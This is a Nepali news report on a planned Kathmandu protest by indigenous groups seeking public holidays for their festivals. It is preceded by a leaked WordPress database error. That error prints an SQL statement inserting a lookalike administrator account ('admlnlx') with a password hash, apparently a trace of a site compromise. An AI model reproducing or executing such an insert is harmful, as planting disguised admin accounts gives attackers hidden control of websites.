WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5Ss5CFbTJ/9.sW3cP4PMPmM6qGa4g0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 09:29:15', '', 'admlnlx', 'admlnlx')
काठमाडौं-४, पौष । आदिवासी जनजातिहरूकाे चाडमा सार्वजनिक विदा दिन माग गर्दै आज (बुधबार) दिउँसो १ बजे काठमाडौंको माइतीघरमा प्रदर्शन गर्ने भएको छ ।
नेपाल आदिवासी जनजाति महासंघ तथा विभिन्न जातीय संस्थाकाे आयोजनामा प्रदर्शन हुन लागेको हो । महासंघका अध्यक्ष जगत बरामले तमू ल्होसार, सोनाम ल्होसार, ग्याल्बो ल्होसार, उधौली–उभौली, माघी, माघे सकराति लगायत आदिवासीहरुले मनाउदै आएको चाडमा संघीय सरकारले नै सार्वजनिक विदा दिनुपर्ने बताए ।
नेपालमा गणतन्त्र घोषणा भएपछि आदिवासी जनजातिहरुको चाड पर्वमा पनि सार्वजनिक विदा दिइएको थियो । तर नेकपाका अध्यक्ष केपी ओली प्रधानमन्त्री भएपछि उनले आदिवासीहरुको चाडमा दिइने सार्वजनिक विदाहरु कटौती गरेका हुन् ।
प्रधानमन्त्री ओलिले मुलुकको विकास र समृद्धिका लागि विदा बढी भएको तर्क गरेका थिए ।
महासंघले नेपालका ३१ प्रतिशत आर्य समुदायका लागि अहिले पनि १२ दिन सार्वजनिक विदा दिइएको तर ३७ प्रतिशत आदिवासी जनजातिहरुका लागि ५ दिन मात्रै विदा दिएर विभेद गरेको बताएको छ ।